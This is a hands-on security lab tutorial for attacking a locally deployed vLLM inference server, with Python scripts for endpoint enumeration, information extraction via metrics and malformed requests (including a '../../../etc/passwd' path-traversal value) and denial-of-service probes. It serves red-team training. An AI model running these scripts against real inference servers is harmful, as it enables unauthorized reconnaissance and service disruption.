Lab: Inference Server Exploitation
Attack vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.
Prerequisites
- Docker and Docker Compose installed
- Understanding of REST APIs and gRPC
- Python with
httpx,grpcio, andpython-dotenv - Familiarity with model serving architectures
pip install httpx grpcio grpcio-tools aiohttp python-dotenvBackground
Inference servers like vLLM, HuggingFace TGI, and NVIDIA Triton are the backbone of production LLM deployments. Their attack surface extends beyond the model itself to include management APIs, health endpoints, metrics dashboards, and configuration interfaces that may expose sensitive information or enable denial of service.
Lab Exercises
Deploy a Vulnerable Inference Server
Set up a local vLLM instance with default configuration to serve as the attack target.
version: "3.8" services: vllm: image: vllm/vllm-openai:latest ports: - "8000:8000" command: > --model TinyLlama/TinyLlama-1.1B-Chat-v1.0 --max-model-len 2048 --dtype float16 deploy: resources: reservations: devices: - driver: nvidia count: 1 capabilities: [gpu] environment: - VLLM_LOGGING_LEVEL=DEBUGdocker compose up -d # Wait for model to load sleep 30 curl http://localhost:8000/healthEnumerate Exposed Endpoints
Discover and catalog all endpoints exposed by the inference server.
#!/usr/bin/env python3 """Enumerate inference server endpoints for information disclosure.""" import httpx BASE_URL = "http://localhost:8000" # Common inference server endpoints across vLLM, TGI, and Triton ENDPOINTS = [ # vLLM endpoints "/health", "/v1/models", "/v1/completions", "/v1/chat/completions", "/metrics", "/version", "/tokenize", "/detokenize", # Common debug/management endpoints "/debug", "/config", "/status", "/info", "/v2/health/ready", "/v2/health/live", "/v2/models", "/v2/repository/index", # Metrics and monitoring "/metrics/prometheus", "/stats", "/dashboard", # Documentation "/docs", "/redoc", "/openapi.json", ] def enumerate_endpoints(): results = {"accessible": [], "forbidden": [], "not_found": []} for endpoint in ENDPOINTS: try: resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5) if resp.status_code == 200: results["accessible"].append({ "path": endpoint, "content_type": resp.headers.get("content-type", "unknown"), "body_preview": resp.text[:200], }) elif resp.status_code == 403: results["forbidden"].append(endpoint) else: results["not_found"].append(endpoint) except httpx.RequestError: results["not_found"].append(endpoint) print("=== Accessible Endpoints ===") for ep in results["accessible"]: print(f" {ep['path']} [{ep['content_type']}]") print(f" {ep['body_preview'][:100]}...") print(f"\n=== Forbidden: {len(results['forbidden'])} ===") print(f"=== Not Found: {len(results['not_found'])} ===") return results if __name__ == "__main__": enumerate_endpoints()python endpoint_enum.pyExtract Model and System Information
Use discovered endpoints to extract sensitive configuration details.
#!/usr/bin/env python3 """Extract model and system information from inference server.""" import httpx import json BASE_URL = "http://localhost:8000" def extract_model_info(): """Extract model configuration and metadata.""" print("=== Model Information ===") # Model list reveals model names, sizes, and configuration resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5) if resp.status_code == 200: models = resp.json() print(f"Models: {json.dumps(models, indent=2)}") # OpenAPI schema reveals all available parameters resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5) if resp.status_code == 200: schema = resp.json() paths = list(schema.get("paths", {}).keys()) print(f"\nAPI paths: {paths}") def extract_metrics(): """Extract Prometheus metrics for infrastructure intelligence.""" print("\n=== Prometheus Metrics ===") resp = httpx.get(f"{BASE_URL}/metrics", timeout=5) if resp.status_code == 200: lines = resp.text.split("\n") interesting = [l for l in lines if any( k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"] ) and not l.startswith("#")] for line in interesting[:20]: print(f" {line}") def extract_error_info(): """Trigger errors to extract stack traces and internal info.""" print("\n=== Error Information Extraction ===") # Send malformed requests to trigger verbose errors payloads = [ {"model": "nonexistent-model", "messages": [{"role": "user", "content": "test"}]}, {"model": "../../../etc/passwd", "prompt": "test"}, {"messages": [{"role": "system", "content": "A" * 100000}]}, ] for payload in payloads: try: resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json=payload, timeout=10, ) if resp.status_code != 200: error_body = resp.text[:500] print(f" Status {resp.status_code}: {error_body}") except Exception as e: print(f" Exception: {e}") if __name__ == "__main__": extract_model_info() extract_metrics() extract_error_info()python info_extraction.pyDocument all information disclosed through each endpoint.
Test Denial-of-Service Vectors
Identify resource exhaustion and DoS vectors specific to inference servers.
#!/usr/bin/env python3 """Test denial-of-service vectors against inference server. WARNING: Run only against local test instances. Never against production.""" import httpx import time import threading from concurrent.futures import ThreadPoolExecutor BASE_URL = "http://localhost:8000" def test_context_overflow(): """Test handling of max-context-length inputs.""" print("=== Context Overflow Test ===") long_prompt = "Repeat this. " * 10000 # Exceed context window try: start = time.time() resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json={ "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0", "messages": [{"role": "user", "content": long_prompt}], "max_tokens": 10, }, timeout=30, ) elapsed = time.time() - start print(f" Status: {resp.status_code} ({elapsed:.1f}s)") print(f" Response: {resp.text[:200]}") except Exception as e: print(f" Error: {e}") def test_concurrent_load(): """Test server behavior under concurrent request load.""" print("\n=== Concurrent Load Test ===") def make_request(i): try: start = time.time() resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json={ "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0", "messages": [{"role": "user", "content": f"Count to {i}"}], "max_tokens": 100, }, timeout=60, ) elapsed = time.time() - start return {"id": i, "status": resp.status_code, "latency": elapsed} except Exception as e: return {"id": i, "status": "error", "error": str(e)} # Gradually increase concurrency for concurrent in [5, 10, 20]: with ThreadPoolExecutor(max_workers=concurrent) as executor: start = time.time() futures = [executor.submit(make_request, i) for i in range(concurrent)] results = [f.result() for f in futures] total = time.time() - start errors = sum(1 for r in results if r["status"] != 200) avg_latency = sum( r.get("latency", 0) for r in results if r["status"] == 200 ) / max(1, concurrent - errors) print(f" Concurrent={concurrent}: errors={errors}, " f"avg_latency={avg_latency:.1f}s, total={total:.1f}s") def test_max_tokens_abuse(): """Test behavior with extreme max_tokens values.""" print("\n=== Max Tokens Abuse ===") for max_tokens in [1, 100, 10000, 100000, -1, 0]: try: resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json={ "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0", "messages": [{"role": "user", "content": "Hi"}], "max_tokens": max_tokens, }, timeout=30, ) print(f" max_tokens={max_tokens}: status={resp.status_code}") except Exception as e: print(f" max_tokens={max_tokens}: error={e}") if __name__ == "__main__": test_context_overflow() test_concurrent_load() test_max_tokens_abuse()python dos_vectors.py
Troubleshooting
| Issue | Solution |
|---|---|
| Docker container fails to start | Verify GPU drivers and NVIDIA container toolkit installation |
| No GPU available | Use CPU-only mode by removing GPU configuration from docker-compose |
| Server returns 503 during tests | The model may still be loading; wait longer after startup |
| Metrics endpoint not found | Different server versions expose metrics at different paths |
Related Topics
- Container Breakout - Escaping from containerized inference servers
- Model Serving Attacks - Broader model serving framework attacks
- GPU Side-Channel - Hardware-level information leakage
- Full-Stack Exploit - Chaining infrastructure with model vulnerabilities
References
- "vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM inference server
- "Security Analysis of ML Inference Servers" - Chen et al. (2024) - Security assessment of common inference frameworks
- "Denial of Service Attacks on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
- "MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - Security best practices for inference infrastructure
Why are inference server endpoints a security concern even when the underlying model is well-aligned?